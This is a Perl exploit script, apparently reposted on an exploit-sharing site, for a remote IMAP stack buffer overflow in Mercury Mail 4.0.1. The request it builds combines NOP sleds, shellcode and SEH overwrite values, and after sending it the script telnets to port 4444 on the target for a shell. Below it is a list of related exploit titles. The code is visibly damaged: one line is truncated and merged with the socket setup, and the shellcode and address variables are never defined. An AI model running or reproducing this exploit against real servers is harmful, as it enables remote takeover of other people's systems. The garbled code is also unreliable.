#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st requestn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd requestn";
sleep(1);
my $request=("x45" x7420).("x90" x10).$happy.("x90" x14).$shellcode.("x41" x8).$nextseh.$seh.("x90" x5).$jmp.("x90" x533);
send $socket, $request, 0;
print "[ ] Sent final requestn";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
【Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit】相关文章:
★ Debian Sarge Multiple IMAP Server Denial of Service Exploit
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
★ moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
★ Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)
★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit